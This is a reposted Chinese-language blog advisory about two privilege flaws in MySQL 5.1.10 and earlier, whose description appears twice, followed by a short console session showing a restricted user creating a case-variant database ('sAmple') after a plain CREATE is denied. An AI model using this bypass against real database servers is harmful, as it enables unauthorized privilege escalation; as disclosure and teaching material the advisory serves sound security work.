MySQL許可權提升及安全限制繞過漏洞(轉)
MySQL許可權提升及安全限制繞過漏洞(轉)[@more@]受影響系統:
MySQL AB MySQL <= 5.1.10
描述:BUGTRAQ ID: 19559
MySQL是一款使用非常廣泛的開放原始碼關聯式資料庫系統,擁有各種平臺的執行版本。在MySQL上,擁有訪問許可權但無建立許可權的使用者可以建立與所訪問資料庫僅有名稱字母大小寫區別的新資料庫。成功利用這個漏洞要求執行MySQL的檔案系統支援區分大小寫的檔名。
此外,由於在錯誤的安全環境中計算了suid例程的引數,攻擊者可以透過儲存的例程以例程定義者的許可權執行任意DML語句。成功攻擊要求使用者對所儲存例程擁有EXECUTE許可權。
測試方法:
警 告:以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
1 建立資料庫
MySQL AB MySQL <= 5.1.10
描述:BUGTRAQ ID: 19559
MySQL是一款使用非常廣泛的開放原始碼關聯式資料庫系統,擁有各種平臺的執行版本。在MySQL上,擁有訪問許可權但無建立許可權的使用者可以建立與所訪問資料庫僅有名稱字母大小寫區別的新資料庫。成功利用這個漏洞要求執行MySQL的檔案系統支援區分大小寫的檔名。
此外,由於在錯誤的安全環境中計算了suid例程的引數,攻擊者可以透過儲存的例程以例程定義者的許可權執行任意DML語句。成功攻擊要求使用者對所儲存例程擁有EXECUTE許可權。
測試方法:
警 告:以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
1 建立資料庫
|
CODE:
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password: Welcome to the MySQL monitor. Commands end with ; or g. Your MySQL connection id is 263935 to server version: 4.1.16-standard mysql> create database another; ERROR 1044: Access denied for user 'sample'@'%' to database 'another' mysql> create database sAmple; Query OK, 1 row affected (0.00 sec) 來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617731/viewspace-960811/,如需轉載,請註明出處,否則將追究法律責任。
上一篇:
MySQL資料庫中修改密碼方法總結(轉)
請登入後發表評論
登入
全部評論
北京盛拓優訊資訊科技有限公司. 版權所有 京ICP備16024965號-8 北京市公安局海淀分局網監中心備案編號:11010802021510 niuxiaotong@pcpop.com 17352615567 未成年人舉報專區 廣播電視節目製作經營許可證(京) 字第1234號 中國網際網路協會會員 |
相關文章
- Java安全之Filter許可權繞過JavaFilter
- Docker安全:通過Docker提升許可權Docker
- XWorkParameterInterceptor類繞過安全限制漏洞-解決2
- Guest許可權突破——許可權提升方法總結(轉)
- 怎麼繞過許可權看朋友圈
- PrintNightmare漏洞補丁再被繞過!新的手段可獲得Windows管理員許可權Windows
- 【轉】關於MySQL許可權MySql
- Linux 許可權管理之目錄許可權限制Linux
- 超過40個Windows裝置驅動程式包含提升許可權的漏洞Windows
- mysql 管理:mysql 執行許可權(轉)MySql
- 眾至科技:漏洞通告 | 微軟10月釋出多個安全漏洞;Apache Shiro許可權繞過漏洞;Apache Commons存在程式碼執行漏洞微軟Apache
- mysql許可權MySql
- MySQL 許可權MySql
- Mysql存取許可權系統(轉)MySql
- MySQL 使用者及許可權管理?MySql
- MySQL使用者及許可權管理MySql
- 記憶體安全週報第93期 | 許可權提升成為微軟頭號漏洞記憶體微軟
- Hacking Team攻擊程式碼分析Part5 Adobe Font Driver核心許可權提升漏洞第二彈+Win32k KALSR繞過漏洞Win32
- Mysql——許可權管理MySql
- Mysql 許可權管理MySql
- MySQL許可權管理MySql
- AIX 的許可許可權(轉)AI
- mysql 8.0.21使用者及許可權操作MySql
- mysql儲存過程的許可權 definerMySql儲存過程
- 研究發現超過 40 個 Windows 裝置驅動程式包含提升許可權的漏洞Windows
- Metasploit許可權提升全劇終
- AD域安全之Windows Print Spooler許可權提升漏洞(CVE-2021-1675)淺析Windows
- mysql 使用者及許可權管理 小結MySql
- Oracle資料庫訪問限制繞過漏洞 解決Oracle資料庫
- MySQL儲存過程的許可權問題MySql儲存過程
- mysql許可權參考MySql
- MySQL許可權問題MySql
- MySQL reload許可權MySql
- MySQL許可權系統MySql
- [玄月]MySQL許可權MySql
- Oracle 11gR2高危許可權安全漏洞解決Oracle
- 1、Win7UAC的安全、相容及許可權Win7
- 許可權概念、許可權提升概念以及許可權提升的分類和目的 Windows 提權的基礎原理是瞭解作業系統的安全機制和許可權管理 Windows提權攻擊的進一步知識概念Windows作業系統